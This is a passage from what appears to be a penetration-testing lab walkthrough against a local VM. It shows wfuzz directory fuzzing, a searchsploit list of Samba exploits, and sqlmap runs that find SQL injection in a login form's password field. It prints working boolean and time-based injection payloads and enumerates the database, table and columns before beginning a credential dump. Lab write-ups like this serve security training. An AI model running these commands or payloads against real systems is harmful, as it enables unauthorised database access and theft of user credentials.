┌──(root㉿kali)-[/home/kali]
└─# wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/big.txt --hc 404 http://192.168.1.6/FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.1.6/FUZZ
Total requests: 3024

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000001629:   302        0 L      0 W        0 Ch        "logout"
000001736:   302        1 L      22 W       220 Ch      "member"
000002294:   301        9 L      31 W       350 Ch      "robert"
000001458:   301        9 L      31 W       348 Ch      "john"
000001350:   200        45 L     94 W       1255 Ch     "index"
000001337:   301        9 L      31 W       350 Ch      "images"
000000566:   403        10 L     33 W       326 Ch      "cgi-bin/"

Total time: 5.687175
Processed Requests: 3024
Filtered Requests: 3017
Requests/sec.: 531.7226

2.5.6 Searching for Samba vulnerabilities with searchsploit

┌──(root㉿kali)-[/home/kali]
└─# searchsploit samba 3.        
------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                       |  Path
------------------------------------------------------------------------------------- ---------------------------------
Samba 2.2.0 < 2.2.8 (OSX) - trans2open Overflow (Metasploit)                         | osx/remote/9924.rb
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (1)                           | unix/remote/22468.c
Samba 3.0.10 (OSX) - 'lsa_io_trans_names' Heap Overflow (Metasploit)                 | osx/remote/16875.rb
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass                               | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)     | unix/remote/16320.rb
Samba 3.0.21 < 3.0.24 - LSA trans names Heap Overflow (Metasploit)                   | linux/remote/9950.rb
Samba 3.0.24 (Linux) - 'lsa_io_trans_names' Heap Overflow (Metasploit)               | linux/remote/16859.rb
Samba 3.0.24 (Solaris) - 'lsa_io_trans_names' Heap Overflow (Metasploit)             | solaris/remote/16329.rb
Samba 3.0.27a - 'send_mailslot()' Remote Buffer Overflow                             | linux/dos/4732.c
Samba 3.0.29 (Client) - 'receive_smb_raw()' Buffer Overflow (PoC)                    | multiple/dos/5712.pl
Samba 3.0.4 - SWAT Authorisation Buffer Overflow                                     | linux/remote/364.pl
Samba 3.3.12 (Linux x86) - 'chain_reply' Memory Corruption (Metasploit)              | linux_x86/remote/16860.rb
Samba 3.3.5 - Format String / Security Bypass                                        | linux/remote/33053.txt
Samba 3.4.16/3.5.14/3.6.4 - SetInformationPolicy AuditEventsInfo Heap Overflow (Meta | linux/remote/21850.rb
Samba 3.4.5 - Symlink Directory Traversal                                            | linux/remote/33599.txt
Samba 3.4.5 - Symlink Directory Traversal (Metasploit)                               | linux/remote/33598.rb
Samba 3.4.7/3.5.1 - Denial of Service                                                | linux/dos/12588.txt
Samba 3.5.0 - Remote Code Execution                                                  | linux/remote/42060.py
Samba 3.5.0 < 4.4.14/4.5.10/4.6.4 - 'is_known_pipename()' Arbitrary Module Load (Met | linux/remote/42084.rb
Samba 3.5.11/3.6.3 - Remote Code Execution                                           | linux/remote/37834.py
Samba 3.5.22/3.6.17/4.0.8 - nttrans Reply Integer Overflow                           | linux/dos/27778.txt
Samba < 3.0.20 - Remote Heap Overflow                                                | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC)                                        | linux_x86/dos/36741.py
Sambar Server 4.3/4.4 Beta 3 - Search CGI                                            | windows/remote/20223.txt
Sambar Server 6.1 Beta 2 - 'showini.asp' Arbitrary File Access                       | windows/remote/24163.txt
------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

3. Penetration testing

3.1 SQL injection

3.1.1 Capturing the login request with Burp Suite

┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/kl_4]
└─# vim sql.txt

┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/kl_4]
└─# cat sql.txt  
POST /checklogin.php HTTP/1.1
Host: 192.168.1.6
Content-Length: 47
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.1.6
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.1.6/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

myusername=admin&mypassword=123456&Submit=Login

3.1.2 Enumerating the databases

┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/kl_4]
└─# sqlmap -r sql.txt --batch --level 3 --dbs
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.8.3#stable}
|_ -| . [)]     | .'| . |
|___|_  [.]_|_|_|__,|  _||_|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:35:59 /2024-06-12/

[09:35:59] [INFO] parsing HTTP request from 'sql.txt'
[09:36:00] [INFO] testing connection to the target URL
[09:36:00] [INFO] testing if the target URL content is stable
[09:36:00] [INFO] target URL content is stable
[09:36:00] [INFO] testing if POST parameter 'myusername' is dynamic
[09:36:00] [WARNING] POST parameter 'myusername' does not appear to be dynamic
[09:36:00] [WARNING] heuristic (basic) test shows that POST parameter 'myusername' might not be injectable
[09:36:00] [INFO] testing for SQL injection on POST parameter 'myusername'
[09:36:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:36:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[09:36:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[09:36:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[09:36:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)'
[09:36:01] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[09:36:01] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[09:36:01] [INFO] testing 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)'
[09:36:01] [INFO] testing 'Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[09:36:02] [INFO] testing 'SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)'
[09:36:02] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[09:36:02] [INFO] testing 'PostgreSQL boolean-based blind - Parameter replace'
[09:36:02] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace'
[09:36:02] [INFO] testing 'Oracle boolean-based blind - Parameter replace'
[09:36:02] [INFO] testing 'Informix boolean-based blind - Parameter replace'
[09:36:02] [INFO] testing 'Microsoft Access boolean-based blind - Parameter replace'
[09:36:02] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'
[09:36:02] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL - original value)'
[09:36:02] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'
[09:36:02] [INFO] testing 'Boolean-based blind - Parameter replace (CASE - original value)'
[09:36:02] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[09:36:02] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[09:36:02] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[09:36:02] [INFO] testing 'PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause'
[09:36:02] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause'
[09:36:02] [INFO] testing 'Oracle boolean-based blind - ORDER BY, GROUP BY clause'
[09:36:02] [INFO] testing 'HAVING boolean-based blind - WHERE, GROUP BY clause'
[09:36:02] [INFO] testing 'PostgreSQL boolean-based blind - Stacked queries'
[09:36:02] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)'
[09:36:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:36:02] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[09:36:03] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[09:36:03] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:36:03] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[09:36:03] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[09:36:03] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONVERT)'
[09:36:03] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT)'
[09:36:04] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[09:36:04] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'
[09:36:04] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[09:36:04] [INFO] testing 'Firebird AND error-based - WHERE or HAVING clause'
[09:36:04] [INFO] testing 'MonetDB AND error-based - WHERE or HAVING clause'
[09:36:05] [INFO] testing 'Vertica AND error-based - WHERE or HAVING clause'
[09:36:05] [INFO] testing 'IBM DB2 AND error-based - WHERE or HAVING clause'
[09:36:05] [INFO] testing 'ClickHouse AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[09:36:05] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[09:36:05] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[09:36:05] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[09:36:05] [INFO] testing 'PostgreSQL error-based - Parameter replace'
[09:36:05] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace'
[09:36:05] [INFO] testing 'Oracle error-based - Parameter replace'
[09:36:05] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[09:36:05] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[09:36:05] [INFO] testing 'PostgreSQL error-based - ORDER BY, GROUP BY clause'
[09:36:05] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Stacking (EXEC)'
[09:36:05] [INFO] testing 'Generic inline queries'
[09:36:05] [INFO] testing 'MySQL inline queries'
[09:36:05] [INFO] testing 'PostgreSQL inline queries'
[09:36:05] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[09:36:05] [INFO] testing 'Oracle inline queries'
[09:36:05] [INFO] testing 'SQLite inline queries'
[09:36:06] [INFO] testing 'Firebird inline queries'
[09:36:06] [INFO] testing 'ClickHouse inline queries'
[09:36:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[09:36:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[09:36:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[09:36:06] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[09:36:06] [INFO] testing 'PostgreSQL < 8.2 stacked queries (Glibc - comment)'
[09:36:06] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[09:36:06] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (DECLARE - comment)'
[09:36:06] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[09:36:06] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[09:36:07] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[09:36:07] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[09:36:07] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[09:36:07] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[09:36:07] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[09:36:07] [INFO] testing 'MySQL AND time-based blind (ELT)'
[09:36:08] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[09:36:08] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[09:36:08] [INFO] testing 'Oracle AND time-based blind'
[09:36:08] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[09:36:08] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[09:36:08] [INFO] testing 'PostgreSQL > 8.1 time-based blind - Parameter replace'
[09:36:08] [INFO] testing 'Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)'
[09:36:08] [INFO] testing 'Oracle time-based blind - Parameter replace (DBMS_PIPE.RECEIVE_MESSAGE)'
[09:36:08] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[09:36:08] [INFO] testing 'PostgreSQL > 8.1 time-based blind - ORDER BY, GROUP BY clause'
[09:36:08] [INFO] testing 'Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_LOCK.SLEEP)'
[09:36:08] [INFO] testing 'Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_PIPE.RECEIVE_MESSAGE)'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
[09:36:08] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[09:36:09] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
[09:36:09] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[09:36:09] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[09:36:10] [WARNING] POST parameter 'myusername' does not seem to be injectable
[09:36:10] [INFO] testing if POST parameter 'mypassword' is dynamic
[09:36:10] [WARNING] POST parameter 'mypassword' does not appear to be dynamic
[09:36:10] [INFO] heuristic (basic) test shows that POST parameter 'mypassword' might be injectable (possible DBMS: 'MySQL')
[09:36:10] [INFO] testing for SQL injection on POST parameter 'mypassword'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (3) and risk (1) values? [Y/n] Y
[09:36:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:36:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[09:36:10] [INFO] POST parameter 'mypassword' appears to be 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)' injectable (with --not-string="28")
[09:36:10] [INFO] testing 'Generic inline queries'
[09:36:10] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[09:36:10] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
got a 302 redirect to 'http://192.168.1.6/login_success.php?username=admin'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] N
[09:36:10] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[09:36:10] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[09:36:10] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[09:36:10] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[09:36:10] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[09:36:10] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[09:36:10] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:36:10] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:36:10] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[09:36:10] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[09:36:11] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[09:36:11] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[09:36:11] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:36:11] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[09:36:11] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[09:36:11] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[09:36:11] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[09:36:11] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[09:36:11] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[09:36:11] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[09:36:11] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[09:36:11] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[09:36:11] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[09:36:11] [INFO] testing 'MySQL inline queries'
[09:36:11] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[09:36:11] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[09:36:11] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[09:36:11] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[09:36:11] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[09:36:11] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[09:36:11] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[09:36:21] [INFO] POST parameter 'mypassword' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[09:36:21] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[09:36:21] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[09:36:21] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[09:36:21] [INFO] target URL appears to have 3 columns in query
do you want to (re)try to find proper UNION column types with fuzzy test? [y/N] N
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
[09:36:22] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql') 
[09:36:22] [INFO] target URL appears to be UNION injectable with 3 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
[09:36:23] [INFO] testing 'Generic UNION query (59) - 21 to 40 columns'
[09:36:23] [INFO] testing 'Generic UNION query (59) - 41 to 60 columns'
[09:36:23] [INFO] testing 'MySQL UNION query (59) - 1 to 20 columns'
[09:36:24] [INFO] testing 'MySQL UNION query (59) - 21 to 40 columns'
[09:36:24] [INFO] testing 'MySQL UNION query (59) - 41 to 60 columns'
[09:36:24] [INFO] testing 'MySQL UNION query (59) - 61 to 80 columns'
[09:36:25] [INFO] testing 'MySQL UNION query (59) - 81 to 100 columns'
[09:36:25] [INFO] checking if the injection point on POST parameter 'mypassword' is a false positive
POST parameter 'mypassword' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 1473 HTTP(s) requests:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: myusername=admin&mypassword=123456' AND 5147=(SELECT (CASE WHEN (5147=5147) THEN 5147 ELSE (SELECT 3625 UNION SELECT 8434) END))-- -&Submit=Login

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: myusername=admin&mypassword=123456' AND (SELECT 1417 FROM (SELECT(SLEEP(5)))ImmZ)-- MSgA&Submit=Login
---
[09:36:25] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP, Apache 2.2.8, PHP 5.2.4
back-end DBMS: MySQL >= 5.0.12
[09:36:25] [INFO] fetching database names
[09:36:25] [INFO] fetching number of databases
[09:36:25] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:36:25] [INFO] retrieved: 3
[09:36:25] [INFO] retrieved: information_schema
[09:36:26] [INFO] retrieved: members
[09:36:26] [INFO] retrieved: mysql
available databases [3]:
[*] information_schema
[*] members
[*] mysql

[09:36:27] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.6'

[*] ending @ 09:36:27 /2024-06-12/

Databases obtained:

  • information_schema
  • members
  • mysql

3.1.3 Current database

┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/kl_4]
└─# sqlmap -r sql.txt --batch --level 3 --current-db
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.8.3#stable}
|_ -| . ["]     | .'| . |
|___|_  [']_|_|_|__,|  _||_|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:42:14 /2024-06-12/

[09:42:14] [INFO] parsing HTTP request from 'sql.txt'
[09:42:15] [INFO] resuming back-end DBMS 'mysql' 
[09:42:15] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: myusername=admin&mypassword=123456' AND 5147=(SELECT (CASE WHEN (5147=5147) THEN 5147 ELSE (SELECT 3625 UNION SELECT 8434) END))-- -&Submit=Login

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: myusername=admin&mypassword=123456' AND (SELECT 1417 FROM (SELECT(SLEEP(5)))ImmZ)-- MSgA&Submit=Login
---
[09:42:15] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[09:42:15] [INFO] fetching current database
[09:42:15] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:42:15] [INFO] retrieved: members
current database: 'members'
[09:42:15] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.6'

[*] ending @ 09:42:15 /2024-06-12/

The currently connected database is:

  • members

3.1.4 Tables in the connected database

┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/kl_4]
└─# sqlmap -r sql.txt --batch --level 3 -D members --tables
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.8.3#stable}
|_ -| . ["]     | .'| . |
|___|_  ["]_|_|_|__,|  _||_|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:45:10 /2024-06-12/

[09:45:10] [INFO] parsing HTTP request from 'sql.txt'
[09:45:10] [INFO] resuming back-end DBMS 'mysql' 
[09:45:10] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: myusername=admin&mypassword=123456' AND 5147=(SELECT (CASE WHEN (5147=5147) THEN 5147 ELSE (SELECT 3625 UNION SELECT 8434) END))-- -&Submit=Login

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: myusername=admin&mypassword=123456' AND (SELECT 1417 FROM (SELECT(SLEEP(5)))ImmZ)-- MSgA&Submit=Login
---
[09:45:11] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: Apache 2.2.8, PHP 5.2.4
back-end DBMS: MySQL >= 5.0.12
[09:45:11] [INFO] fetching tables for database: 'members'
[09:45:11] [INFO] fetching number of tables for database 'members'
[09:45:11] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:45:11] [INFO] retrieved: 1
[09:45:11] [INFO] retrieved: members
Database: members
[1 table]
+---------+
| members |
+---------+

[09:45:11] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.6'

[*] ending @ 09:45:11 /2024-06-12/

Connected database: members
Table name: members

3.1.5 Column names

┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/kl_4]
└─# sqlmap -r sql.txt --batch --level 3 -D members -T members --columns
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.8.3#stable}
|_ -| . [(]     | .'| . |
|___|_  ["]_|_|_|__,|  _||_|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:48:22 /2024-06-12/

[09:48:22] [INFO] parsing HTTP request from 'sql.txt'
[09:48:22] [INFO] resuming back-end DBMS 'mysql' 
[09:48:22] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: myusername=admin&mypassword=123456' AND 5147=(SELECT (CASE WHEN (5147=5147) THEN 5147 ELSE (SELECT 3625 UNION SELECT 8434) END))-- -&Submit=Login

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: myusername=admin&mypassword=123456' AND (SELECT 1417 FROM (SELECT(SLEEP(5)))ImmZ)-- MSgA&Submit=Login
---
[09:48:22] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[09:48:22] [INFO] fetching columns for table 'members' in database 'members'
[09:48:22] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:48:22] [INFO] retrieved: 3
[09:48:22] [INFO] retrieved: id
[09:48:23] [INFO] retrieved: int(4)
[09:48:23] [INFO] retrieved: username
[09:48:23] [INFO] retrieved: varchar(65)
[09:48:24] [INFO] retrieved: password
[09:48:24] [INFO] retrieved: varchar(65)
Database: members
Table: members
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(4)      |
| password | varchar(65) |
| username | varchar(65) |
+----------+-------------+

[09:48:25] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.6'

[*] ending @ 09:48:25 /2024-06-12/

Columns obtained:

  • id
  • password
  • username

3.1.6 Usernames and passwords

┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/kl_4]
└─# sqlmap -r sql.txt --batch --level 3 -D members -T members -C id,username,password --dump
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.8.3#stable}
|_ -| . [)]     | .'| . |
|___|_  [)]_|_|_|__,|  _||_|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:52:26 /2024-06-12/

[09:52:26] [INFO] parsing HTTP request from 'sql.txt'
[09:52:26] [INFO] resuming back-end DBMS 'mysql' 
[09:52:26] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: myusername=admin&mypassword=123456' AND 5147=(SELECT (CASE WHEN (5147=5147) THEN 5147 ELSE (SELECT 3625 UNION SELECT 8434) END))-- -&Submit=Login

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: myusername=admin&mypassword=123456' AND (SELECT 1417 FROM (SELECT(SLEEP(5)))ImmZ)-- MSgA&Submit=Login
---
[09:52:26] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: Apache 2.2.8, PHP 5.2.4
back-end DBMS: MySQL >= 5.0.12
